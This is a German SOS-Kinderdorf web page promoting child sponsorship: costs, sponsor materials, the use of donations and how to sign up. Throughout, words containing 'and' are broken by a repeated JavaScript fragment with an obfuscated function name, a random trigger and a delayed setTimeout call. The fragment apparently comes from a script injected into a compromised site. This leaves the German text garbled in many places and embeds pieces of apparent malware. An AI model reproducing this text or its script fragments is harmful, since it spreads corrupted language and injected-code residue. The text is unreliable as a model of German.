Die SOS-Kindpatenschaft

Sichern Sie die Zukunft eines Kindes

Als Pate für ein Kind da sein und ihm gezielt helfen

Mit einer Kindpatenschaft werden Sie Pate für ein Kind in seiner SOS-Familie in Afrika, Asien oder Lateinamerika. Mit Ihrem Beitrag sorgen Sie unter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderem für das Essen, die Kleidung, die Schulausbildung und die medizinische Versorgung Ihres Patenkindes.

Was kostet eine Kindpatenschaft?

Ihr monatlicher Beitrag beträgt 31 Euro, das entspricht etwa einem Euro pro Tag. Damit reichen Sie einem Kind, das Schlimmes erlebt hat, Ihre Handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Sie helfen, mit der Patenschaft die Zukunft des Kindes zu sichern.

Patenkinder im SOS-Kinderdorf

Was bekomme ich, wenn ich mich für eine Patenschaft eines Kindes entscheide?

  • Wenn Sie Pate für ein Kind werden, bekommen Sie etwa zehn Tage nach der Anmeldung Ihre persönlichen Patenunterlagen mit einem Foto Ihres Patenkindes. Außerdem erhalten Sie zusätzliche Informationen zum SOS-Kinderdorf und dem jeweiligen Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and sowie Ihr Patenhandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andbuch. Damit Sie auch an Ihr Patenkind schreiben können, teilen wir Ihnen die Korrespondenzadresse mit.
  • Im weiteren Verlauf der Kindpatenschaft informieren wir Sie einmal jährlich postalisch mit einem Bericht über die Entwicklung Ihres Patenkindes und das Leben in seinem SOS-Kinderdorf. Zu Weihnachten bekommen Sie ein aktuelles Foto.
  • Außerdem erhalten Sie vierteljährlich unsere kostenlose SOS-Zeitung.
  • Nach Jahresabschluss senden wir Ihnen im Februar automatisch eine Zuwendungsbestätigung über die Beiträge Ihrer Kindpatenschaft. Denn diese sind steuerlich absetzbar. Sie können die Patenschaft für das Kind jederzeit und ohne Angabe von Gründen beenden.

Patenkind auf dem Weg zur SOS-SchuleIhre Unterstützung kommt an!

Ihr Paten-Beitrag ist zweckgebunden. Mit diesem Betrag unterstützen Sie Ihr Patenkind und sein Zuhause, also das jeweilige SOS-Kinderdorf sowie dessen Zusatzeinrichtungen (etwa SOS-Schulen und
SOS-Ausbildungszentren). Wir bemühen uns erfolgreich um angemessene Werbe- und Verwaltungskosten. Im Bereich der Patenschaften behalten wir für die organisatorische Abwicklung zehn Prozent als Pauschale von den Patenbeiträgen ein.

Wie melde ich mich für eine Kindpatenschaft an?

Wenn Sie sich entschließen, Pate für ein Kind zu werden, können Sie sich über unser sicheres Online-Formular oder telefonisch unter 0800 50 30 500 anmelden. Bei Ihrer Anmeldung können Sie unter andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anderem den Kontinent und das Landom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and auswählen, in dem Sie ein Kind unterstützen möchten. Auch andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andere Wünsche, wie etwa das Alter des Patenkindes, versuchen wir gerne zu berücksichtigen.

Sie haben noch Fragen?

Wir haben hier die häufigsten Fragen und Antworten zur Kindpatenschaft für Sie zusammengestellt. Wenn Sie zudem weitere Informationen benötigen, können Sie gratis Informationen per Post anfordern.

Gerne helfen wir Ihnen bei Fragen zur Kindpatenschaft auch persönlich weiter. Rufen Sie uns kostenfrei an oder schreiben Sie uns.

Nehmen Sie ein Schicksal in die Handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and. Werden Sie SOS-Pate!